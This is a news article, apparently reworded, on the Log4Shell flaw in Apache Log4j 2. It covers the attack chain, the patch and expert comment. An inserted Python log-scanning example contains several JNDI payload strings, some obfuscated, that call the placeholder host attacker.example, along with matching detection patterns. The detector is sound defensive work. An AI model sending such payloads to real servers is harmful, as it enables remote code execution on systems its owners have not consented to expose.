Apache Log4j zero-day exploit puts a large number of servers at serious risk | eSecurity Planet

2021-12-14 16:11:01 By : Mr. Yong Hong

A serious vulnerability in the open source logging library Apache Log4j 2 has set off a scramble across the cybersecurity world. The Apache Software Foundation (ASF) has issued an emergency security update as bad actors search for vulnerable servers.

Log4j 2 was developed by ASF and is a widely used Java package that provides logging for a range of popular applications. The vulnerability, tracked as CVE-2021-44228, is a zero-day that allows unauthenticated remote code execution (RCE), letting attackers take control of systems running the software.

The vulnerability is called Log4Shell, and its severity score is 10/10, the highest possible. The Apache Foundation released an emergency patch as part of Log4j 2 version 2.15.0 to fix the RCE vulnerability. Later on Friday, Cybereason released a "vaccine" intended to prevent exploitation of the Log4Shell vulnerability.


According to security professionals, the software is used by enterprise applications and cloud-based services, and the vulnerability could have a wide-ranging impact on enterprises. Log4Shell also reportedly affects the default configuration of several Apache frameworks, such as Apache Struts2, Apache Druid and Apache Flink.

Free Wortley, CEO of the cybersecurity company LunaSec, and Chris Thompson, one of the company's developers, wrote in a blog post: "Given the ubiquity of the library, the impact of exploits (full server control), and the ease of exploitation, the impact of this vulnerability is very serious. Anyone who uses Apache Struts may be attacked. We have seen similar vulnerabilities exploited in the 2017 Equifax data breach and other breaches."

They wrote that many services are vulnerable, including cloud services such as Apple iCloud and Steam, and applications such as Minecraft. Open source projects such as Paper, a Minecraft server, have begun patching Log4j 2. Servers used by well-known companies such as Twitter, Cloudflare, Apple, and Tencent have also been found to be vulnerable to Log4Shell attacks.

According to reports, many other open source projects, such as ElasticSearch, Redis, and Elastic Logstash, also use Log4j.

The Log4Shell vulnerability emerged a few months after open source security became the central topic of discussion at this year's Black Hat Conference.


The US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert, urging users to apply patches to upgrade the software or use the mitigation steps recommended by ASF.

The RCE vulnerability, originally discovered by the Alibaba Cloud security team at the end of last month, affects Log4j versions 2.0-beta9 through 2.14.1. According to LunaSec, Log4Shell can be exploited on a vulnerable server whenever user-supplied data reaches it over any protocol. The server logs the data from the request, which contains the malicious payload, and the logged payload triggers the Log4j vulnerability.

The server then sends a request to attacker.com via the Java Naming and Directory Interface (JNDI); the response contains the path of a remote Java class file, which is injected into the server process. That injected payload is the second stage, and it lets the attacker execute arbitrary code.
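As an added defensive illustration (not code from the article, LunaSec or the Log4j project), the following Python script shows how a log-review or WAF-style rule would first collapse the nested lookup tricks used to disguise a `${jndi:...}` string and only then match on it; the log lines and hostnames are constructed placeholders.

```python
import re

# Constructed sample log lines (not from the article): benign requests beside
# lines carrying Log4Shell-style JNDI lookups, including the nested-lookup
# obfuscations seen in scanning traffic. Hostnames are placeholders.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET /" 200 "${${lower:j}ndi:${lower:r}mi://attacker.example/x}"',
    '10.0.0.7 - - "GET /" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example}"',
    '10.0.0.3 - - "GET /api" 200 "price is ${env:HOME}"',
]

# Innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Plain JNDI lookup prefix; Log4j matches lookup names case-insensitively.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(body: str) -> str:
    """Reduce one innermost lookup body to the text Log4j 2 would substitute."""
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                  # ${name:-default} yields the default value
        return body.split(":-", 1)[1]
    return "${" + body + "}"          # other lookups (jndi, env, ...) stay as-is

def normalize(text: str) -> str:
    """Collapse nested and obfuscated lookups until no more can be reduced."""
    while True:
        changed = False

        def _sub(match):
            nonlocal changed
            out = _resolve(match.group(1))
            changed = changed or out != match.group(0)
            return out

        text = _INNER.sub(_sub, text)
        if not changed:
            return text

def is_log4shell_probe(line: str) -> bool:
    """True when the line, once de-obfuscated, carries a ${jndi:...} lookup."""
    return bool(_JNDI.search(normalize(line)))

def scan(lines):
    """Return (index, normalized line) for every flagged log line."""
    return [(i, normalize(l)) for i, l in enumerate(lines) if is_log4shell_probe(l)]
```

Running `scan(SAMPLE_LOGS)` flags the three lookup-bearing lines and leaves the benign request and the harmless `${env:HOME}` line alone, which is the point: a rule that matches only the literal string `${jndi:` misses the two obfuscated variants.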

The flurry of activity around Log4Shell began on Thursday, when the vulnerability was disclosed in a tweet that included proof-of-concept (PoC) code.

"This is the worst-case scenario," Casey Ellis, founder and chief technology officer of crowdsourced security vendor Bugcrowd, told eSecurity Planet, noting that "Log4j is used ubiquitously in software and platforms, and there are many ways to exploit this vulnerability. The combination of that, of being able to patch the dependencies of this vulnerability without breaking other things, and of the fact that the exploit itself fits in a tweet means that, for many people, this will be a long weekend."


Many organizations, including Deutsche Telekom and New Zealand’s Computer Emergency Response Team (CERT), said they have seen attackers looking for servers vulnerable to Log4Shell attacks. Deutsche Telekom officials stated in a tweet that they "are observing attacks on our honeypot infrastructure from the TOR network."

In a similar tweet, the security company GreyNoise reported that it "currently sees 2 unique IPs scanning the Internet for new Apache Log4j RCE vulnerabilities..."

"The RCE vulnerability on the web server represents the most serious problem," John Bambenek, chief threat hunter at the cybersecurity company Netenrich, told eSecurity Planet. "As the PoC code has been released, we are likely to start seeing exploits by the end of today. Since web applications running this type of setup usually handle sensitive information, relevant mitigation measures should be applied immediately, including updating Java."

He added that web application firewalls should also be updated with appropriate rules to block such attacks.

Researchers on the cybersecurity company Randori's Attack Team wrote in a blog post that they developed a working exploit and successfully exploited the Log4j vulnerability in customer environments as part of the vendor's offensive security platform.

They wrote: "The vulnerability can be accessed through a variety of application-specific methods. In fact, any scenario that allows remote connections to provide arbitrary data written to log files by applications that use the Log4j library can easily be exploited. This vulnerability is very likely to be exploited in the wild and may affect thousands of organizations. This vulnerability poses a significant real risk to the affected system."

Still, the Randori researchers wrote that the long-term impact of Log4Shell is not easy to assess, even though the immediate impact will be felt.

"The Log4j 2 library is very commonly used in enterprise Java software," they wrote. "Because of this deployment method, the impact is difficult to quantify. Similar to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe that more and more vulnerable products will be discovered in the coming weeks. Because of the ease of exploitation and the broad scope of application, we suspect that ransomware attackers will immediately start exploiting this vulnerability."

Dor Dali, director of information security at cybersecurity provider Vulcan Cyber, told eSecurity Planet that he ranks it among the top three most serious vulnerabilities of this year.

"It is no exaggeration to say that every enterprise organization uses Java, and Log4j is one of the most popular Java logging frameworks," Dali said. "At this point, if mitigation measures are not taken immediately, the impact of this vulnerability will have great influence and potential. The Log4j vulnerability is relatively easy to exploit. We have seen verifiable reports that bad actors are actively targeting the activities of some of the largest companies in the world."

